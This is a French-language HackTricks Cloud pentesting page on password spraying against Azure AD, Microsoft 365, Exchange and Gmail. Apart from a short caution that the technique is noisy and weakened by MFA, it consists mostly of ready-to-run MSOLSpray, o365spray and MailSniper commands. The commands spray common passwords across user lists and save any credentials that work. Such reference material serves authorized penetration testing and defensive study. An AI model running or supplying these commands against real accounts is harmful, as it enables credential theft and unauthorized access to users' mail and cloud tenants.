Files
hacktricks-cloud/src/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-password-spraying.md

1.5 KiB

Az - Password Spraying

{{#include ../../../banners/hacktricks-training.md}}

Password Spray

Dans Azure, cela peut être fait contre différents points de terminaison API comme Azure AD Graph, Microsoft Graph, Office 365 Reporting webservice, etc.

Cependant, notez que cette technique est très bruyante et que l'équipe de sécurité peut facilement la détecter. De plus, la complexité de mot de passe forcée et l'utilisation de MFA peuvent rendre cette technique presque inutile.

Vous pouvez effectuer une attaque par pulvérisation de mots de passe avec MSOLSpray

. .\MSOLSpray\MSOLSpray.ps1
Invoke-MSOLSpray -UserList .\validemails.txt -Password Welcome2022! -Verbose

Ou avec o365spray

python3 o365spray.py --spray -U validemails.txt -p 'Welcome2022!' --count 1 --lockout 1 --domain victim.com

Ou avec MailSniper

#OWA
Invoke-PasswordSprayOWA -ExchHostname mail.domain.com -UserList .\userlist.txt -Password Spring2021 -Threads 15 -OutFile owa-sprayed-creds.txt
#EWS
Invoke-PasswordSprayEWS -ExchHostname mail.domain.com -UserList .\userlist.txt -Password Spring2021 -Threads 15 -OutFile sprayed-ews-creds.txt
#Gmail
Invoke-PasswordSprayGmail -UserList .\userlist.txt -Password Fall2016 -Threads 15 -OutFile gmail-sprayed-creds.txt

{{#include ../../../banners/hacktricks-training.md}}